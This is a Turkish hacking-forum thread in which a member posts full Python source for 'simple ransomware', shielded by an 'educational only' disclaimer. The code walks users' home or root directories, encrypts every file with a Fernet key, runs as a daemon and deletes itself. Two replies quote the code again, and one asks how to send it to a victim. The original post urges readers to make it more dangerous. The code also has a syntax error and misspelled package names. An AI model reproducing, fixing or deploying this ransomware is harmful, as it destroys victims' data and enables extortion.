PYTHON ile basit fidye virüsü

TheBaritz

Yeni üye
25 Ocak 2023
4
1
ÖNCELİKLE SELAMUN ALEYKÜM
BUGÜN SİZLERE PYTONLA YAPABİLECEĞİNİZ BASİT FİDYE VİRÜSÜ KODLARINI PAYLAŞICAM
(Not:Bu sadece eğitim amaçlıdır herhangi bir kötüye kullanımda sorumluluk kabul etmiyorum)

!UYARI!
BU KODU KENDİ SİSTEMİNİZDE ÇALIŞTIRMAYINIZ
[/SIZE][/B][/COLOR] import os,sys import platform try: from cryptography.fernet import Fernet except: print("Birkütüphane bulunamadı ! Yüklemeye çalışıyorum") os.system("pip3 install crytography") try: from cryptography.fernet import Fernet sys.exit("başarılı ! Yeniden Başlat") except: os.system("pip3 install cartography --user") try: from cryptography.fernet import Fernet sys.exit("Başarılı ! Yeniden başlat") except: sys.exit("Başarısız ! Lütfen Bu paketin kurulu olup olmadığını kontrol edin !\n\t ->crptography") try: import daemon except: print("bir kütüphane bulunuamadı ! yüklemeye çalışıyorum") os.system("pip3 install python-daemon") sys.exit("başarılı ! Yeniden başlat") try: import daemon except: os.system("pip3 install python-daemon --user") sys.exit("başarılı ! Yeniden başlat") try: import daemon except: sys.exit("Başarısız ! Lütfen Bu paketin kurulu olup olmadığını kontrol edin !\n\t ->python-daemon") key = Fernet.generate_key() fer = Fernet(key) print("Unutma ! Key -->"+str(key)) with open("key.key";"ab") as yaz: yaz.write(key) def isle(dosya): try: with open(dosya,"rb") as oku:oku=oku.read() with open(dosya,"wb") as yaz:yaz.write(fer.encrypt(oku)) except:pass if platform.system() == "Windows": baglac = "\\" konum = "\\Users" elif platform.system() == "Linux": baglac = "/" if platform.machine() == "aarch64": konum = "/root" else: konum = "/home" else: raise OSError("Seninle işimiz yok haydi işine") def matematik(): for adres in os.walk(konum): if adres[2]: for dosya in adres[2]: link = f"{adres[0]}{baglac}{dosya}" isle(link) with daemon.DaemonContext(): os.remove(sys.argv[0]) matematik() [COLOR=rgb(65, 168, 95)][B][SIZE=5]
Eğer python biliyorsanız birazdaha değişiklik yapıp daha tehlikeli bir virüs yapabilirsiniz

Bu virüs rastgele şifre oluşturur eğer kendi şifrenizi belirlemek istiyorsanız 34. satırdaki kodu değiştirebilirsiniz

Biraz daha araştırmayla çok iyi bir virüs yapabilirsiniz

Helmsys

Yazılım Ekibi Kıdemli
16 Mar 2022
1,490
1,649
raise OSError("Seninle işimiz yok haydi işine") kısmına patladım
Kod paylaşımı Nazım Hikmet'in "Makinalaşmak İstiyorum!" şiirine benzediğinden ne 34. satırı bulabildim ne de yazdığınız satırı görebildim.
Saolsun üstteki arkadaşlar da belirtmemişler.

(Not:Bu sadece eğitim amaçlıdır herhangi bir kötüye kullanımda sorumluluk kabul etmiyorum)

!UYARI!
[/SIZE][/B][/COLOR][/SIZE][/SIZE] [SIZE=5][SIZE=5]import os,sys[/SIZE][/SIZE] [SIZE=5][SIZE=5]import platform[/SIZE][/SIZE] [SIZE=5][SIZE=5]try:[/SIZE][/SIZE] [SIZE=5][SIZE=5] from cryptography.fernet import Fernet[/SIZE][/SIZE] [SIZE=5][SIZE=5]except:[/SIZE][/SIZE] [SIZE=5][SIZE=5] print("Birkütüphane bulunamadı ! Yüklemeye çalışıyorum")[/SIZE][/SIZE] [SIZE=5][SIZE=5] os.system("pip3 install crytography")[/SIZE][/SIZE] [SIZE=5][SIZE=5] try:[/SIZE][/SIZE] [SIZE=5][SIZE=5] from cryptography.fernet import Fernet[/SIZE][/SIZE] [SIZE=5][SIZE=5] sys.exit("başarılı ! Yeniden Başlat")[/SIZE][/SIZE] [SIZE=5][SIZE=5] except:[/SIZE][/SIZE] [SIZE=5][SIZE=5] os.system("pip3 install cartography --user")[/SIZE][/SIZE] [SIZE=5][SIZE=5] try:[/SIZE][/SIZE] [SIZE=5][SIZE=5] from cryptography.fernet import Fernet[/SIZE][/SIZE] [SIZE=5][SIZE=5] sys.exit("Başarılı ! Yeniden başlat")[/SIZE][/SIZE] [SIZE=5][SIZE=5] except:[/SIZE][/SIZE] [SIZE=5][SIZE=5] sys.exit("Başarısız ! Lütfen Bu paketin kurulu olup olmadığını kontrol edin !\n\t ->crptography")[/SIZE][/SIZE] [SIZE=5][SIZE=5]try:[/SIZE][/SIZE] [SIZE=5][SIZE=5] import daemon[/SIZE][/SIZE] [SIZE=5][SIZE=5]except:[/SIZE][/SIZE] [SIZE=5][SIZE=5] print("bir kütüphane bulunuamadı ! yüklemeye çalışıyorum")[/SIZE][/SIZE] [SIZE=5][SIZE=5] os.system("pip3 install python-daemon")[/SIZE][/SIZE] [SIZE=5][SIZE=5] sys.exit("başarılı ! Yeniden başlat")[/SIZE][/SIZE] [SIZE=5][SIZE=5] try:[/SIZE][/SIZE] [SIZE=5][SIZE=5] import daemon[/SIZE][/SIZE] [SIZE=5][SIZE=5] except:[/SIZE][/SIZE] [SIZE=5][SIZE=5] os.system("pip3 install python-daemon --user")[/SIZE][/SIZE] [SIZE=5][SIZE=5] sys.exit("başarılı ! Yeniden başlat")[/SIZE][/SIZE] [SIZE=5][SIZE=5] try:[/SIZE][/SIZE] [SIZE=5][SIZE=5] import daemon[/SIZE][/SIZE] [SIZE=5][SIZE=5] except:[/SIZE][/SIZE] [SIZE=5][SIZE=5] sys.exit("Başarısız ! Lütfen Bu paketin kurulu olup olmadığını kontrol edin !\n\t ->python-daemon")[/SIZE][/SIZE] [SIZE=5][SIZE=5]key = Fernet.generate_key()[/SIZE][/SIZE] [SIZE=5][SIZE=5]fer = Fernet(key)[/SIZE][/SIZE] [SIZE=5][SIZE=5]print("Unutma ! Key -->"+str(key))[/SIZE][/SIZE] [SIZE=5][SIZE=5]with open("key.key";"ab") as yaz:[/SIZE][/SIZE] [SIZE=5][SIZE=5] yaz.write(key)[/SIZE][/SIZE] [SIZE=5][SIZE=5]def isle(dosya):[/SIZE][/SIZE] [SIZE=5][SIZE=5] try:[/SIZE][/SIZE] [SIZE=5][SIZE=5] with open(dosya,"rb") as oku:oku=oku.read()[/SIZE][/SIZE] [SIZE=5][SIZE=5] with open(dosya,"wb") as yaz:yaz.write(fer.encrypt(oku))[/SIZE][/SIZE] [SIZE=5][SIZE=5] except:pass[/SIZE][/SIZE] [SIZE=5][SIZE=5]if platform.system() == "Windows":[/SIZE][/SIZE] [SIZE=5][SIZE=5] baglac = "\\"[/SIZE][/SIZE] [SIZE=5][SIZE=5] konum = "\\Users"[/SIZE][/SIZE] [SIZE=5][SIZE=5]elif platform.system() == "Linux":[/SIZE][/SIZE] [SIZE=5][SIZE=5] baglac = "/"[/SIZE][/SIZE] [SIZE=5][SIZE=5] if platform.machine() == "aarch64":[/SIZE][/SIZE] [SIZE=5][SIZE=5] konum = "/root"[/SIZE][/SIZE] [SIZE=5][SIZE=5] else:[/SIZE][/SIZE] [SIZE=5][SIZE=5] konum = "/home"[/SIZE][/SIZE] [SIZE=5][SIZE=5]else:[/SIZE][/SIZE] [SIZE=5][SIZE=5] raise OSError("Seninle işimiz yok haydi işine")[/SIZE][/SIZE] [SIZE=5][SIZE=5]def matematik():[/SIZE][/SIZE] [SIZE=5][SIZE=5] for adres in os.walk(konum):[/SIZE][/SIZE] [SIZE=5][SIZE=5] if adres[2]:[/SIZE][/SIZE] [SIZE=5][SIZE=5] for dosya in adres[2]:[/SIZE][/SIZE] [SIZE=5][SIZE=5] link = f"{adres[0]}{baglac}{dosya}"[/SIZE][/SIZE] [SIZE=5][SIZE=5] isle(link)[/SIZE][/SIZE] [SIZE=5][SIZE=5]with daemon.DaemonContext():[/SIZE][/SIZE] [SIZE=5][SIZE=5] os.remove(sys.argv[0])[/SIZE][/SIZE] [SIZE=5][SIZE=5] matematik()[/SIZE][/SIZE] [SIZE=5][SIZE=5][COLOR=rgb(65, 168, 95)][B][SIZE=5]
Eğer python biliyorsanız birazdaha değişiklik yapıp daha tehlikeli bir virüs yapabilirsiniz

Bu virüs rastgele şifre oluşturur eğer kendi şifrenizi belirlemek istiyorsanız 34. satırdaki kodu değiştirebilirsiniz

Zahmet edip kaynağı da paylaştığınız için teşekkürler.

zeatrox

Yeni üye
21 Mar 2023
7
0

!UYARI!
[/SIZE][/B][/COLOR][/SIZE] [SIZE=5]import os,sys[/SIZE] [SIZE=5]import platform[/SIZE] [SIZE=5]try:[/SIZE] [SIZE=5] from cryptography.fernet import Fernet[/SIZE] [SIZE=5]except:[/SIZE] [SIZE=5] print("Birkütüphane bulunamadı ! Yüklemeye çalışıyorum")[/SIZE] [SIZE=5] os.system("pip3 install crytography")[/SIZE] [SIZE=5] try:[/SIZE] [SIZE=5] from cryptography.fernet import Fernet[/SIZE] [SIZE=5] sys.exit("başarılı ! Yeniden Başlat")[/SIZE] [SIZE=5] except:[/SIZE] [SIZE=5] os.system("pip3 install cartography --user")[/SIZE] [SIZE=5] try:[/SIZE] [SIZE=5] from cryptography.fernet import Fernet[/SIZE] [SIZE=5] sys.exit("Başarılı ! Yeniden başlat")[/SIZE] [SIZE=5] except:[/SIZE] [SIZE=5] sys.exit("Başarısız ! Lütfen Bu paketin kurulu olup olmadığını kontrol edin !\n\t ->crptography")[/SIZE] [SIZE=5]try:[/SIZE] [SIZE=5] import daemon[/SIZE] [SIZE=5]except:[/SIZE] [SIZE=5] print("bir kütüphane bulunuamadı ! yüklemeye çalışıyorum")[/SIZE] [SIZE=5] os.system("pip3 install python-daemon")[/SIZE] [SIZE=5] sys.exit("başarılı ! Yeniden başlat")[/SIZE] [SIZE=5] try:[/SIZE] [SIZE=5] import daemon[/SIZE] [SIZE=5] except:[/SIZE] [SIZE=5] os.system("pip3 install python-daemon --user")[/SIZE] [SIZE=5] sys.exit("başarılı ! Yeniden başlat")[/SIZE] [SIZE=5] try:[/SIZE] [SIZE=5] import daemon[/SIZE] [SIZE=5] except:[/SIZE] [SIZE=5] sys.exit("Başarısız ! Lütfen Bu paketin kurulu olup olmadığını kontrol edin !\n\t ->python-daemon")[/SIZE] [SIZE=5]key = Fernet.generate_key()[/SIZE] [SIZE=5]fer = Fernet(key)[/SIZE] [SIZE=5]print("Unutma ! Key -->"+str(key))[/SIZE] [SIZE=5]with open("key.key";"ab") as yaz:[/SIZE] [SIZE=5] yaz.write(key)[/SIZE] [SIZE=5]def isle(dosya):[/SIZE] [SIZE=5] try:[/SIZE] [SIZE=5] with open(dosya,"rb") as oku:oku=oku.read()[/SIZE] [SIZE=5] with open(dosya,"wb") as yaz:yaz.write(fer.encrypt(oku))[/SIZE] [SIZE=5] except:pass[/SIZE] [SIZE=5]if platform.system() == "Windows":[/SIZE] [SIZE=5] baglac = "\\"[/SIZE] [SIZE=5] konum = "\\Users"[/SIZE] [SIZE=5]elif platform.system() == "Linux":[/SIZE] [SIZE=5] baglac = "/"[/SIZE] [SIZE=5] if platform.machine() == "aarch64":[/SIZE] [SIZE=5] konum = "/root"[/SIZE] [SIZE=5] else:[/SIZE] [SIZE=5] konum = "/home"[/SIZE] [SIZE=5]else:[/SIZE] [SIZE=5] raise OSError("Seninle işimiz yok haydi işine")[/SIZE] [SIZE=5]def matematik():[/SIZE] [SIZE=5] for adres in os.walk(konum):[/SIZE] [SIZE=5] if adres[2]:[/SIZE] [SIZE=5] for dosya in adres[2]:[/SIZE] [SIZE=5] link = f"{adres[0]}{baglac}{dosya}"[/SIZE] [SIZE=5] isle(link)[/SIZE] [SIZE=5]with daemon.DaemonContext():[/SIZE] [SIZE=5] os.remove(sys.argv[0])[/SIZE] [SIZE=5] matematik()[/SIZE] [SIZE=5][COLOR=rgb(65, 168, 95)][B][SIZE=5]

bunu nasıl birine yollicam detaylı anlatım var mı

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.